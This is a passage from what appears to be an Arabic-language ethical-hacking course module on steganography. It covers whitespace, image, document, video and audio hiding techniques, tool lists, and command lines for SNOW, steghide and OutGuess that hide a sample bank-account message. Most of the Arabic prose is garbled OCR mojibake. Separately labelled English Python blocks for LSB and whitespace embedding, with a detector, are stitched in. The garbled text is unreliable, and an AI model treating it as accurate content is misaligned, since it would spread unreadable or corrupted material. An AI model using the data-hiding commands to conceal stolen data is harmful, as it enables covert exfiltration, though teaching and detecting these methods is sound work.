^ jj^ L_jUi!>lxi3 jj£l<Jt ^atjjkjjojVt t(*6 JaJjaJt L_fl i^il^j A-ii^xJt L_fl J^pJt t^^kt <^J> > nj AjiljJaVt CjUi jlstxJt Jj^J ^JJ > n j 

jjjj* ^jt (JjJJ t^ailt (jla ^Lii^. CjU» jls«-<» t flJ - (jt (j^J 6(4jJ^xJt L_flj^pJ3 <Jjou31j jj£ ujjlt 4 JjUJtj t^ajoixJt c^J^liJt L_flj^pJt 

c_jjjii3t L_jUi!>lc. j AjflLjal (blank spaces) ^ djliLai^ ciiti LijUuisu Jc t(jJXML) c5 >^ 

Ajilk Jc (J^aJjt (J^aj j& <JaLoiJ jj£t (JULo cilLiA j ,l^jJajC JJC Ajj^ (JJ^J (jl ^^t j t^L^^Vt j Ja Ja^Jt j 6<illk-<i ^jt jit til3i£ j 6^)JajojVt 

"selecting". &jjj^j ^ c-L ui Sj jl c jSaj ^tj ^^Liajj 
« ((ZWJ)zero-width-joiner)' (non-printing)^W^ ^ j^h ^ jj^ ^l^i^l Jj ^i^j LjJLaVl dIa j^t 

^ l^al^aujuil jSaj t^jj^xJt <illt J ^jj^Jt Jx^j Jx^ajl j^Vt .(ZWNJ) (zero-width non-joiner) 

.l^jJajC- ^jj V JWUj '^iiii^t AJJ^Vt J IgJ ^gis^ V CIjU jlxJt ^ILkV jjlt A^U^Jt jj^Jt 

jSjjj^ui JUL!! ^ti^Luut -6 

Jjlsu tiAj .1021 X 6.71 LS^t J 'J^J^J^ 3*^ J jkJt jjij ^tlilaJt ^ JJJjJt tSlllaJ jSjJjjoj jUJVl ^tj^klojU CjU jlstJt 

.dij 56 ^ ^ikloj ^iJt DES 4ij jia jjSIj ^ jSl Ig-Wj Lu» tdij 70 Jt 
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HOW STEGANOGRAPHY WORKS 



jjj^all dial* jic cilli ^jj \^ iKrt ^ ^uiLxJI djULiJI t^^ajll a\\ (Js^\ ^fiL^\ Iujj Steganography 

<C a£ JJ jJJ*£3l jt$J> jjj^II (jjj^J ^aJJ .CjLg jIslxJI s-lik] 4-jl*-^ (Jl*-^ J ^ J^ 1 J^VI ^ CllaajL^ai 4_i*aj3l jjj^II <J^.b 

j-o j las j Sjjj^ c aL> ^ <Jjuo£j1I j* <c a\\ cifc <jj j^j* ^jj .Cjj 24 8 J Jj^ 1 ^ J^-^a*J 6<Jjuo£j3I CjIji^ j j* 



[Figure: Cover Image plus the message EC-Council "Hackers are here. Where are you?" -> Embedding function -> Stego Image -> Extracting function -> Cover Image plus the recovered message] 


Types of Steganography 

SjU j ,<!ljajj3l j j^-j (j* ^Jzjxj ^^alLJ! jjc. ^.1 V <Ljia3! £>i& <J1* 4_jik-<J! <JjLaij3! ^alc j ^jfl j& Steganography 

4j.uiL.uV1 CjL* jlx*ll s-lik] .CAjLjII s-lik] (j£**ll ^ u ^1 fiJJJ^ll CliLi^ j] ^j^lil £* 4_ijjjj£3V1 ClllaLJ! ^-j - ^ SjjI jj*l! dl*l,J^JjuiVI 

{document making) jfl .(document making) jfl j (data hiding) ^la^j :u^W^ 

. (Fingerprinting) ^ ^ > ^ l j (watermarking) CjU^UJI ^ j^VI ^ j .^uJi/5JI jVI ^ ajU^J! ^ 

:^Ult jaalt ^fe Steganography <> ^iHa^ ^IjSi ^ 
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'Data Embedding Security Schemes" ^UUJI £#a^ <>l cjtLkL* 



. "channel robustness analysis jp- sUS 311* ^ u j* > ^ t ^ jjl jblkl o^jj <c_iVUJI ^Jm* yi 

c flllai ^ .(JjLoj^)3I ^jj^uJall key scheme" '^^^ * * ^Ia^LuJ JIjc. jjUuloJI aAlL* (jj^vi Jc <J-g*j ^31 s.^) j 

u '^ Vl J j£jA *f^fi\ \ <^ *^Uj ^2 .<ul.ikU jjlkj ^LojI Jc t" £ey steganographic system" jl jc- jjli^ 

C-jjau] Jl jC. jjUulaJl ^Uaill J*Ull ^j£3l J)j'qVil a jblkl 4 (jli jUlLj ^nti ^Uail 4(_£^j!i3l JjUaill (jlajC 

^I>lkj Ui\ (j^-GJ 4 JljC- jjUuluJl <itld ^JJjud^j] .^llLo ^I^JjojI jl ^ULd ^|>lkj nil (JJ«i (JA JljC. jjUulaJl ^Uaill J <JjLaJ^)3l A \ >~l\ 

CjUJl (JjuAjujJ (Jj£ nil A-ijl^a.] Jc JjlJU J t^JjL^. <Jkb <ULaJ^)3l (jxi dlUj (^5^ J^lj 4-1 UJ^ l£^J ■l5^ > ^ J^J^^ ^"Uixi 

Ajla jjl ^k jblkVI ^ _Ja3ifl. (jj-ajJallll jjl ^k jblkl ^J^)la (jc <jl ^ II (JjVI (_£ jlluixJl ^*1^J ^JJ _4_LdjJa>Jl <!Luj^)3I 

'(spatial-temporal) 4AjjUj1I-AjjISJI <4jjUJI ^L^k Jja*j Cli^jjl^k jl t (££#) {least significant bii)(^^ <jVl J^*j 

[Figure, part 1: labels (C), (F) steganographic function, (SC), SS (1st protection level), container file] 

J^Lk (jjuJ! ^ULd ^l^klojb tUkSI <jU^JI CjU > '1 ^ ^ ^-v ^jc ^LjaS ^31^0^1 * jj > oil ^liaill 4jLa^ ^^Lolq ^aajj 

jjjj V *>i& ^UL<JI L-jl ^>^->^ ^ JiLd jc. jM auludU alia <J jJa ^^Jc. <-<i!)lc jjj j! ;4_ILuj^)3! JLojI jl ^^^Jcl 64_Ia*^<J! 

. JjVI ^U^JI 

^likV 4_LdjJaxj aJLujj ^JlxJ jl/j 'Ajjl^Jl cJ^-^- '^l^ ^ liLujj t^ULoij ^jjJ ^ ikHujj Jljc. jjl auludll dlULiJ CjI y& 

J£joJI .AjjL^JI J!)lk 4_Iljai^)3! jjj Jc JJjJ A-Lk ;L_Jlii3l <jl <L^Ji ^5 jlLubG ^-Uixi ^Uaj ^l^klLojl ^jj La^jc CjUUJI 

V*n^> ^ClJlIill AA a^W jlaixi 

F(P, L) 
F(P, L) = cycle*L + step*P 



.^ixijjaJI 3JLojj3I khc ^Sj (step) 6 j 6 Lc^^^ ^JaLJl ^Sj Sjjj (cycle) 

Q liA .<JLojj AliC £3 ^ jblkl (jc 5J jjjoixj F(P, L), AjjI^II J, G(Q, N), ^ ^ J aJ^J jblkl (jc J jjjoa-d 

# (^j|^)3l aA ^ jl^iA ^>^>^ a (J£juo1I ^>^l) a-!Ijuj^)3! t aLa 6^.1 j ^j-<» (ciulU) a N-W^U^l aJLuj^I ( 




[Figure, part 2: SC -> F(P, L) -> SS (2nd protection level) -> SS (3rd protection level)] 
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4 



Whitespace Steganography Tool: SNOW 



Jl j CjlaLouJl . jiajoaVI g-i »l > ^nll CjlaLaiJI jj^iaj J!^U. ASCII y?* d^jll ^^lun SNOW j-^jj 



[Screenshot: Administrator: C:\Windows\system32\cmd.exe 
D:\CEH-Tools\CEHv8 Module 05 System Hacking\Whitespace Steganography Tool\Snow\snwdos32>snow -C -m "This is a test for Whitespace Steganography using Snow" -p <password> test.docx snowout.docx 
Compressed by 41.90% 
Message exceeded available space by approximately 340.35%. 
An extra 7 lines were added.] 



http://www.darkside.com.au 

.snow cSjj^^I cs-^* csj-^ ^V><ftll ^1 JliiiVl ^2 (cmd) jj^jj^W (j^^JI jV( ^ J*-*^ 

icPVIS readme.txt ^ U-^h ^jSj ^ Hello world ^ ^ ^i-^j f jfc 




snow -C -m "My swiss bank account number is 45656684512263" -p "magic" readme.txt readme2.txt 

(magic is the password; you can type your desired password instead) 
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Administrator Command Prompt 



"«\CFH Tonlsvc:rHi*a nodule 65 System HachingvstccfAn(igrapby\whitc 3 pace stcg&nogra 

,■ h^NS nohi>s now — C n "fly -iwiss bank account: nunb« i* Is 4565 fi 6845 1ZZ63" -p "nagi 
; " re Adne , t x % re adne 2 , t xt 
innpressed bjy ^J.JVk 

icss^gc exceeded available a pace by approxir»At e ly G71 .43h . 
}n extra 8 lines were added. 

i= ^CEH— Too 1sVCEHv8 Module 05 System HackingSste ganographyMjJi it e space steganogra 
jhy \Snow> 



^ull l^L My swiss bank account number is 45656684512263 Lj* g^tj ^ ^ 

l^LJI ci^ta lS t_aLJI lSj^ ls^ j readme2.txt ^UijU li*a ^5 readme.txt 

snow -C -p "magic" readme2.txt



Administrator: Command Prompt

E:\CEH-Tools\CEHv8 Module 05 System Hacking\steganography\whitespace steganography\Snow>snow -C -m "My swiss bank account number is 45656684512263" -p "magic" readme.txt readme2.txt
Compressed by 23.37%
Message exceeded available space by approximately 571.43%.
An extra 8 lines were added.

E:\CEH-Tools\CEHv8 Module 05 System Hacking\steganography\whitespace steganography\Snow>snow -C -p "magic" readme2.txt
My swiss bank account number is 45656684512263

E:\CEH-Tools\CEHv8 Module 05 System Hacking\steganography\whitespace steganography\Snow>



Edit -> Select all ^ notepad jj^W readme2.txt ^ GUI ^ 

.TABS j ^La^ ^ ajjjoJI yLujjll 
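The SNOW procedure above works by appending tabs and spaces to the ends of lines. As an added example, not part of the original text and not SNOW's own code, the Python below uses a simplified scheme of my own (space = 0, tab = 1, eight bits per line, no compression or encryption) to embed and recover the "Hello world" string mentioned above in a constructed readme, and pairs it with the check a defender would run over documents: counting lines whose trailing whitespace mixes tabs and spaces. SNOW's real encoding differs; the detection side is what transfers.

```python
"""Whitespace (end-of-line) steganography and its detection.

Added example, not from the original text and not SNOW's code. Simplified
scheme (assumption): each payload bit becomes one trailing character on a
cover line, space for 0 and tab for 1, eight bits per line.
"""

BITS_PER_LINE = 8


def ws_embed(cover_text: str, payload: bytes) -> str:
    """Append the payload as trailing spaces/tabs, eight bits per line.
    Raises ValueError when the cover has too few lines (SNOW instead
    appends extra lines, which the screenshots above report)."""
    bits = "".join(f"{b:08b}" for b in payload)
    lines = cover_text.split("\n")
    needed = -(-len(bits) // BITS_PER_LINE)  # ceiling division
    if needed > len(lines):
        raise ValueError(f"need {needed} lines, cover has {len(lines)}")
    out = []
    for i, line in enumerate(lines):
        chunk = bits[i * BITS_PER_LINE:(i + 1) * BITS_PER_LINE]
        tail = "".join("\t" if c == "1" else " " for c in chunk)
        out.append(line.rstrip(" \t") + tail)
    return "\n".join(out)


def ws_extract(text: str) -> bytes:
    """Read the trailing whitespace of every line back into bytes;
    a trailing partial byte is dropped."""
    bits = []
    for line in text.split("\n"):
        stripped = line.rstrip(" \t")
        for ch in line[len(stripped):]:
            bits.append("1" if ch == "\t" else "0")
    bitstr = "".join(bits)
    usable = len(bitstr) - len(bitstr) % 8
    return bytes(int(bitstr[i:i + 8], 2) for i in range(0, usable, 8))


def trailing_ws_report(text: str) -> dict:
    """Defender-side check: how many lines end in whitespace and how many of
    those mix tabs and spaces. Editors leave stray spaces on a few lines; a
    tab/space mix on more than half the lines is anomalous for plain text."""
    lines = text.split("\n")
    trailing = mixed = 0
    for line in lines:
        tail = line[len(line.rstrip(" \t")):]
        if tail:
            trailing += 1
            if " " in tail and "\t" in tail:
                mixed += 1
    return {
        "lines": len(lines),
        "trailing_ws": trailing,
        "mixed_tab_space": mixed,
        "suspicious": len(lines) > 0 and mixed / len(lines) > 0.5,
    }


# Constructed cover text (not from the page): 12 ordinary lines.
COVER = "\n".join(f"Line {i} of an ordinary readme file." for i in range(1, 13))

if __name__ == "__main__":
    stego = ws_embed(COVER, b"Hello world")
    print(ws_extract(stego))
    print(trailing_ws_report(COVER))
    print(trailing_ws_report(stego))
```

The embedded file is byte-for-byte identical to the cover once trailing whitespace is stripped, which is exactly why a scanner should look at line endings rather than at visible text; a policy that normalises trailing whitespace on upload also destroys the channel.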



Image Steganography 



<^.LaJl (jc saj! jll dull ^ s^liluiVl a) c— /ojjj^a cikta tiL 4 > ^al ^11 t^l Image steganography 

CIl^IjAxjII .IgJ jjlxJ Cj^. lij Sjjj^all C5 Jc 1^ cJ^^a J£^J ^JJ^^ LS* is^ ft^jljll bits ^-A^JI .l^i^l^J <ULojj3I ^ILkV ojjj^all 

BMP j JPG j PNG 5iiLk^ cjlqjmn ^ jj^Jl J^b ciL cjU jIslJI ^ILkj t*lsS^ .<J I^jc < LSSII ^ V CjIiJI ^Jc 

^islSU (j^J V Ia jjjIj (Jj^J C-U^ j <9j^)IaJ l^jl Q^j 4JLuj^)3I l^-l^Q cJ^^ aj^-iJl ^-J^^ ^ *^^^ ^—^^ P iklLujj 
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Image domain :o^j^^ J) h^y^ c£*i (Image Steganography Technique) <-l*^ cjUjkJI cjUSj 

.transform domainj 

. (intensity of the pixels)L^ ^ s>Sb* Vv*^ ^ 'Image (spatial) domain <^ 
.s jj^J! ^ J! f^^ ^J jj^JI Jjj^ ^ transform domain (frequency) ^ 

.(Least Significant Bit Insertion) ^llJt <> oh^I I 
.(Masking and Filtering) s jSlill j 
.(Algorithms and Transformation) Jj^j Cjl^jjIj^JI 




Least Significant Bit Insertion -1 

i> jj^t cjUjIx^I ^u v^mM l cjUj^I JSI <> The Least Significant Bit Insertion technique 

^1 LSB A Sd^> ^ULuL J£l [Least Significant Bit (LSB)] lU^ ^ JS! ^I^i^l J^k 

l^Ull j^3l cs^ uj^ u' cs-^ j ^aUJI ajjjoJI dAiUJ! <iu 24 lp^I ^ ^ o^J^ 

(00100111 11101001 11001000) (00100111 11001000 11101001) (11001000 00100111 11101001) 



US Ci> 24 Sjjjuall "H" ^ AtA* 
^UJ! jUll j^i cil^ ,"H" liA 01001000 ^USH ^ jVl <^ "H" ^ 




jjis j^i ^UlUj Sjjj^all c kL ^ dij LSB ^^"^1 ^ j'K^I ^ j^auuJI jla t j^Vl ^rKll ^ H ^ ^bjluaV 
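The insertion described above, worked through on the page's own three 24-bit pixels and the letter "H" (01001000). This is an added example, not code from the original text: it writes one payload bit into the least significant bit of each colour byte, extracts the byte back, and lists which colour bytes actually changed, which is why the alteration is invisible to the eye.

```python
"""LSB insertion on the page's worked example (added code, not the text's own).

Cover: the three RGB pixels given above. Payload: "H" = 01001000.
One payload bit replaces the LSB of one colour byte, so eight of the nine
bytes carry the message and the ninth is untouched.
"""

# The three 24-bit RGB pixels from the text, as (R, G, B) byte triples.
COVER_PIXELS = [
    (0b00100111, 0b11101001, 0b11001000),
    (0b00100111, 0b11001000, 0b11101001),
    (0b11001000, 0b00100111, 0b11101001),
]


def to_bits(data: bytes):
    """Most-significant-bit-first list of bits for a byte string."""
    return [(byte >> i) & 1 for byte in data for i in range(7, -1, -1)]


def from_bits(bits):
    """Inverse of to_bits; a trailing partial byte is dropped."""
    out = bytearray()
    for i in range(0, len(bits) - len(bits) % 8, 8):
        value = 0
        for b in bits[i:i + 8]:
            value = (value << 1) | b
        out.append(value)
    return bytes(out)


def lsb_embed(pixels, payload: bytes):
    """Replace the LSB of successive colour bytes with the payload bits.
    Capacity is one bit per byte, three bytes per pixel."""
    bits = to_bits(payload)
    flat = [c for px in pixels for c in px]
    if len(bits) > len(flat):
        raise ValueError(f"cover holds {len(flat)} bits, payload needs {len(bits)}")
    for i, bit in enumerate(bits):
        flat[i] = (flat[i] & 0xFE) | bit  # clear LSB, then set it to the payload bit
    return [tuple(flat[i:i + 3]) for i in range(0, len(flat), 3)]


def lsb_extract(pixels, n_bytes: int):
    """Read n_bytes back out of the LSBs, in the same byte order."""
    flat = [c for px in pixels for c in px]
    return from_bits([c & 1 for c in flat[:n_bytes * 8]])


def changed_bytes(before, after):
    """Indices of colour bytes that differ. On average only half the LSBs
    disagree with the payload, so roughly half the bytes change, each by 1."""
    a = [c for px in before for c in px]
    b = [c for px in after for c in px]
    return [i for i, (x, y) in enumerate(zip(a, b)) if x != y]


if __name__ == "__main__":
    stego = lsb_embed(COVER_PIXELS, b"H")
    for before, after in zip(COVER_PIXELS, stego):
        print(" ".join(f"{c:08b}" for c in before), "->", " ".join(f"{c:08b}" for c in after))
    print("recovered:", lsb_extract(stego, 1))
    print("bytes changed:", changed_bytes(COVER_PIXELS, stego))
```

Run on the page's pixels, five of the eight carrier bytes change and each by exactly one intensity level; the ninth byte keeps its value 11101001. The same replacement rule generalises to any byte-addressable cover, which is what the tools listed later in this section do.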

Masking and Filtering -2 



^1 c> ^£11 V ^1 o^^J CjI j^3l ^> j;!^ Masking and filtering techniques 

(jiasu ^ laJLujjj '(jjjJl (^^-Sc 4_jjUJI CjU»!>IxI3 a * jl uj a <L^)Iaj djUi jlx-<JI ^likl (Gvayscole images) a^^^J^ ^ (j^j .4 m ^ 
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djUjij ^ J£ . jj^t W*-^ j c&j^ 3 ^ ^j^aUJI ajjjuoII dAiUJl *U^L till ^joij The masking technique 

ciuli ;<jjjuJI (JjLojjII ^ILkV .AjjU j3) jj^Ij jj-^JI ^ Jaj^-J£J-Cjj-24 s^-*^ ^^^^ filtering j (^-^i) Masking 

*tik) jli t^UlUj . jj^Jl ^ ViT t ^l t j £ jjll CjLLc {j* Ujjaij 3 jj^i (s jjj^JI ^ Jx^JI * jaJI) Lossy JPEG .JPEG 
Steganography Image * . .{Masking technique) ^bViuiU Lite fi> Lossy jpeg *>Jt ^ ^ j 1 *^ 

.Sjjj^II (j-a A > <al Calais ^ ol <^ <ULaijll 4j3 (jj^J ^5^1 j JPEG ^* > ^ (j^'N \a <Jax-g diUi^lc. £jJa j <iajuil jjq*n\L 



Masking and filtering techniques are generally used on 24-bit and grayscale images.

The information is not hidden at the "noise" level of the image.

Masking technique uses a method similar to watermarks on actual paper, and it can be done by modifying the luminance of parts of the image.

Masking techniques hide information in such a way that the hidden message is inside the visible part of the image.



Algorithms and Transformation -3 
y?* s jj^ t> ^ The algorithms and transformation technique 

. (Transformation function)dj^ ^^jj <atLLJI k^Jal l djU^jjI^k (j^flaj J^lL ^ s jj^all CjUjkJI *tik] t^ujiill 

<JjuAla ^ JPEG JJ^^ ^ .jy^ JaiuJa *L5i JSi J-gL-a AjjJaUj 5Jb ^Vimj J j^ill j Jai-jJall A^jjl ja. 

JPEG JJ^^ .^J^^ ^--^-^ ^li^.] (j-<i cJ^- jH-'-'H ^ J^J^ S- 5 ji^VI I^A _4 allai ^ jnir > djUjlaui 1 g hq^> 0^-<^ JaijJaJl 4_iLoC 

.JaiuJall 4_iLftC ^JjI^j] <L gaAla COSine * ** 



; J aLia Jjt ^ <^ia^L noil JjaaJ! CjLuSj ^ £j J^l Aj^Ij dUA 

Fast Fourier transformation
Discrete cosine transformation
Wavelet transformation

Image Steganography: QuickStego

Source: http://quickcrypto.com

ajjxJI JjLoi jll 6^1 jSj jU t> Quickstego^^^ clA^ ^ '^jy^ jll ^ ^jQuickstego 

uj^ o jj^ > ^ AiLjaU ^jjoJI (j^ail! jjq ujj tojjj^ll ^Lp^il! Sjjj^ll j > ^al ic ) ^Jj k Quickstego 
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; C5 jVI c5^jj cs-^ j ^ 2 J^-^ j-^j^ J ^^ j ^ ^ Wizard J^La* ^n/nlU 




jjoj ^1 Sjjj^all jUikl J^U. ^ jiil Open Image <jj* Vji ^ jSj cj! j^VI ^ ^ ^j-^h ^ ^ 

.(_£jjuJl (J^aill s-li^V s-Uai£ 1 * ^ l^JLudJ 

THIS IMAGE DOES NOT HAVE A QUICK STEGO SECRET TEXT MESSAGE. 

,6*liaJ ^jjj ^ilt (j-ajll j^fi^V Open Text <jj* f Sjj^l jV*^' ^ 
J^l^j (j^aill £^*L ^ Hide Text u*^ f ^jjj ^ilt (j^aill 1 - ^1 j jjj^all tij^aJ (jVI 

(j-aill J j > ^>^1 U ^jij dii^ L j£*l\ *\Ai fjL Get Text jj ^ j^-j Hide Text jj^ < 

^ j^kj j (The text message is now hidden in image) jit * j^Jl ^ j-aill *tia>J ^Uil ^ 

.Save Image (jj* j^j ^ j ji^l oajJI a? s jj^t ^ j£j l^a j s j^VI s jla^JI 



[Figure: QuickStego - Steganography - Hide (Cybernescence). The text pane holds the sample message to be hidden: "The feet are flexible structures of bones, joints, muscles, and soft tissues that let us stand upright and perform activities like walking, running, and jumping. The feet are divided into three sections: The forefoot contains the five toes (phalanges) and the five longer bones (metatarsals). The midfoot is a pyramid-like collection of bones that form the arches of the feet. These include the three cuneiform bones, the cuboid bone, and the navicular bone."]
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Image Steganography Tools 

Liajl «j tlijLoj Igi^U ^1 Quickstego sl^Vl 



Hide in Picture available at http://sourceforge.net 

CryptaPix available at http://www.briggsoft.com 

BMP Secrets available at http://bmpsecrets.com 

OpenPuff available at http://embeddedsw.net 

Openstego available at http://openstego.sourceforge.net 

PHP-Class Streamsteganography available at http://www.phpclasses.org 

Red JPEG available at http://www.totalcmd.net 

Steganography Studio available at http://stegstudio.sourceforge.net 

Virtual Steganographic Laboratory (VSL) available at http://vsl.sourceforge.net 

Image Steganography Tools for Linux

Steghide -1 

Source: http://steghide.sourceforge.net/download.php
jj^all CjliLJI j ojjx^a a a ^Ijjl ^ cAiUJ! ^^Jc Sj^ta c ^j3I diL* jLcaII ^ILkV ^1 jV( j^xa ^U^j j& Steghide 



steghide embed -cf picture.jpg -ef secret.txt



steghide extract -sf picture.jpg



damien@damien-desktop: ~
File Edit View Search Terminal Help

damien@damien-desktop:~$ steghide extract -sf picture2.jpg
Enter passphrase:
wrote extracted data to "secret.txt".
damien@damien-desktop:~$



Steg -2 

https://steg.drupalgardens.com/stegdownload 

jjiiJl $.\ jjuj jjj^II CjL* jlx-<Jl s-li^V jjLujjIIj CjU» jLlxJI $M±\ dAjjjj ^^jjaij _ + +<^9 t<U a i— Aja ^j; Steg 

jjojjII ^ikluiJl j j^oj .BMP 'PNG 'TIFF 'JPEG (JPG)jJ^^ 5^ l> ^ J*^*^ J ji_jJa* 

(j£-GJ . j lal JJ a jjjjuHll ^Uixaj (JjLxUxJI jjfljudlll ^Uixa <J£ ^I^JjojI ojjj^all ^JJ^J tdjUa jlx-<Jl s-tik] J^ljt-a ^J^^J ^j£-<uJl 

#( ^jai^)3! s^jujLia £c>ili^)i3! (Jj^^l cilj^jj 4 OS X^-* j jj^j ( -— ^ 'U"^\^ / cs-^ cJ-^ Steg 
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[Figure: Steg main window (menu: File, Edit, View, Hide, Extract, Tools, Help) showing the Original Media and Modified Media panes side by side.
**** media Info In ****
Format: 32-bit RGB format (0xffRRGGBB)
Geometry: Height = 166, Width = 320
**** media Info Out ****
Format: 32-bit RGB format (0xffRRGGBB)
Geometry: Height = 166, Width = 320
Status bar: picture1.jpg: Available Space: 19 Kb]



OutGuess -3 

dAiUJ! j^axi <Jt-nla .lIjUUJI j^L^axi (j* S^l j dull ^£ ^LiiLxJl dlLa jIscaII J^-^j JJJJ <^jJl J A-i^Jtc <^JC- jjU jlm Sbl j& OutGueSS 

<jU^3I j 3_jjajli3l dijU3l ^-Ij^ImiI ^j) IgiLi ^ ^jII Sas <q ^—^-^ djL^JljL^ ^AijA\ Axusu .OutGuess j& ^ lIlgj V 
jj ^| ^i^ki^i aj&ai OutGuess J^j5 <(* JPG j PNM j PPM LA^ .J^*^ ^ (jjsAtj* l^U jl ^ l^k 

Jjaxj] l^l^ki^l jLqj seedj Mk±xi (43 u' ^ c±L ^1 ^j^j3 generic iterator object OutGuess 
JjuoLoij i^j] JUj OutGuess 'seed e&j^ ^ ^ ^W^' u^ 3 ^ f .iterator ^ji^ 



outguess -d secret.txt picture.jpg picture-output.jpg



^JJjuj <ULojj AiUiaV ^aij^aJJ ^^Ld^lc ^UJ <ULoj^)3I ^aJ (-K) ^l'^*>nl aJ 



outguess -k "my secret key" -r picture.jpg secret.txt



Document Steganography 

IgJjj^J ^aJJ q\ ^glc 4_}JjuJ| <JjLal^)3l e-li^V a jaJLuJj L_J jLoll J& AijJ jll CjL* jlx-<Jl ^likl 6 Jjj^ll cJ^-^ iUi jIslxJI ^likj <9J^)Ja Jlxi 

jll cJ^.IAj CjUi jIslxJI ^lik] C5^^^ ^^Jd .L3"^ ^ 



[Figure: document steganography flow: Document Files -> StegTool -> Information]
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Document Steganography: wbStego

Source: http://wbstego.wbailer.com

Cy> t&Laj iStaVI oiA j»|jiiuiLj ., Vi1m« ^ cjLsjkAll *UiJ Sbl j& Wbstego 

c^liL j HTML Jj^j ANSI J ASCII <> cljliLJI '16.7m j 256 j 16 u 1 f Windows bitmaps 

Adobe PDF 



[Figure: wbStego4 Wizard, step "Welcome to the wbStego4 Wizard!". Text: The wbStego4 Wizard will guide you step by step through coding/decoding. With wbStego4 you are able to hide any file in a carrier file. If you are familiar with the way the program works you can use the Flowchart-Mode to make all settings in an overview. Button: Start.]



Document Steganography Tools

J AhY)^ «\\ jjVI tS^ CjUL d^b CjUUJI ^U^U cill ^Jil! ^ j^Vl c> 'wbstego sbVl Ji« 

Merge Streams available at http://www.ntkernel.com
Office XML available at http://www.irongeek.com
Data Stash available at http://www.skyjuicesoftware.com
FoxHole available at http://foxhole.sourceforge.net
Xidie Security Suite available at http://www.stegano.net
Hydan available at http://www.crazyboy.com
StegJ available at http://stegj.sourceforge.net
Stegostick available at http://sourceforge.net



Video Steganography 

~\ iklujl ^jj . jlj-dlujU AiixLJ! jj^all L_aL» Cjbl^ldl ^ ^\ 4ji^yA\ cAiLJ! <JjLojj ^U^l ^jlaii Video steganography 
j& <]SU3l jj*iii3l djULd .llai ji&l ciL ^aLaJI <^A* j^*-*^ .AjjjuJI CjLg jLlxJI J>l^j3 Ia jt nr.U jj^JI c!jUL» 

Video Steganography: OmniHide PRO 

Source: http://omnihide.com

Sfego^Ajl\ t aLJi _til3i L»j ^(^ijjaj ^11 CjliLi & 4DjLia jjc. Sjjj^a J^-b t ^^-^ ^ OmniHide PRO 

^ ^aLiJl CjliLJl ^ILkV JJ^ AiLjal Uiajl till ^JJJ >( jjlilala3t (j^cl (j-a tiL ^j-aLaJl ^JjoJI 
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[Figure: OmniHide Pro Trial v1.0, "Hide your data from those prying eyes". Tabs: Omni Hide | Recover | Settings | Go Pro! | About.
Mask File: C:\Users\Administrator\Desktop\Input Images\tiger_display.jpg
File To hide: C:\Users\Administrator\Desktop\Input Images\The tiger.docx
Output File: C:\Users\Administrator\Desktop\Input Images\tiger_display_Out.jpg
[ ] View converted file when complete
Buttons: Hide it!, Exit]



Video Steganography Tools 

Our Secret available at http://www.securekit.net 

RT Steganography available at http://rtstegvideo.sourceforge.net 

Masker available at http://www.softpuls.com 

Max File Encryption available at http://www.softeza.com 

MSU Stegovideo available at http://www.compression.ru 

BDV DataHider available at http://www.bdvnotepad.com 

Stegostick available at http://sourceforge.net 

OpenPuff available at http://embeddedsw.net 

Stegsecret available at http://stegsecret.sourceforge.net 

PSM Encryptor available at http://www.softpedia.com/get/Security/Encrypting/PSM-Encryptor.shtml

Audio Steganography 

MP3 <AU < WAVJ^ Cjjj^JI l^L ciL a >^Uti ajjjuJI VL* jSI *liaL till Audio steganography 

CjI jjjt ill -C5 J jj^II d fll&ll (j-a <^\-& lU'^-'^ t fljila Jjlisu (Jj^ia (jC Ajj jj^II CAiLJ! AjjjuJI <JjLuj^)1I ^jAjJaJ jj^II 

La <Ljiaj <jjjuo1I djUUill jjiAjjaj t . cillil -c _^j jj^all c aLili ^ &Ua^ 3JLojj a (jc L_flJ£l! (db^aiLJI) eavesdropper 
jj^I! t flLftlt CjU» jIslaII ^likl (j^j .(jLaijVI cJ^ t * a '^^ clA^ J^^^ t LLila tilLiA (Jj^j <>— ift j 

.(>20,000Hz) ^jA^ 3 imitb Ac- jjc. ^1 CjI^jj ^l^klojU ji LSB ^1 v^»»ilj 
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(3j2>*1| cjliiJI cjUjk^l * till jjla) Audio Steganography Methods 

^^Ic ^ jflJ ^jJl ^J-ajjl J^Jl ^jq'nj jSlS L_u3LojV1 (J^asu .d jj^all dliLa ^ 4 > A ^ \\ 4j^>juJI (JjLujjJI <L^llaJl Jj^Ial! (J^asu tilUfc 

exploiting ^ lS 4-^^ ^Vu > n j^VI o^axJI < {noise signat)^^y^ * j^j dUjla^ll JL^j 

# dL» jJjlaJI e-li^V ejjIalLall dljLujVI a ^ B » a dLuSj (jjljlklj 

;Cj j^all Cjlil* Aj>y»lt CjU jLlaII f til) iiiHJ 4JUl! c_u]LujSfl 



Echo Data Hiding -1 

^{Echo) J^j c^j^ c> ^ JSU d jlij Jib <j>JI jkJI o^^i <the echo data hiding method ^ 
j^hll c {decay rate)CP^^ J^*-* < {initial amplitude)^ jVl 4*-uJI '{Echo)L£±^\ i> ££15 ^ 

' ffecr^ases)^* 1 ^ o^lLkjl j {Carrier signal) JSU1I &J^] ^ 3^1 jVl Ak. .Ajj^II dULJI *UlV tillij {offset or delay) 

jj-dj ^j-<i a laSllI £>i& ttilli ^ j ,A-iL^Vl ojLoiVl Jl <iK (^^-a ojUjcU {Echo sound)iS^^ t — 3 6 ^ lajjll 

.^-gJjoiaJIj td all ^ ^jj t^L^aVI d all SjLujI 4_iC (Jlxi (J^l jC ^^-Ic Axusu dl jj^aV! 

jj^j jl C; 5^ijj .4iln*JI (j^Ull dSj) delay times c> ^l^i^l ^ ^{Binary form) c*^-^ J^ll ^ <^jU1I s jl^VI j^il 
J!>UjVI Jax^j {initial amplitude)^ jVl <xjuJI Cj^UU^II (J^xj Uiajl ^^ajLj jj^II ^1 j^VI 6^ ^^j' 

-( j!UaVI Icj-^ujixi (jjjJ djjj^all ^ rn^ij ciii^j <c ^ajolaJ! ^11 ^ ^^1 {decay rate) 

Spread Spectrum Method -2 
c_j jLjVI I^a ^>iklu^j . {frequency spectrunt)u?^j^ cAikl! j^a jj£I jjc ajjjoJI cjU jl*-<Jl jJij 4<Ljiall ^ 

{spread spectrum)^^ jU^I <> oii^j 
frequency hopping spread spectrum (FHSS) j Direct sequence spread spectrum (DSSS) 
{pseudo-random signal)^ J 4^1 SjUl ^ 4 iu , hi ^ ^ (djlii) chip rate c> <j>JI ^ll^jll >^ <. DSSSc^ 

^UaiJl 6jLaiVI 1 > ? >n ^aJJ ^^jll j 
^ bju^J S- 1 *^ c ^J^l jU^ojl <9Jjia .dib^jjll jjlJ <C jjoiJ jiL 4Jla tillil ^ jj^all c al^ll dib^jj c LiL ^ 'FHSS 

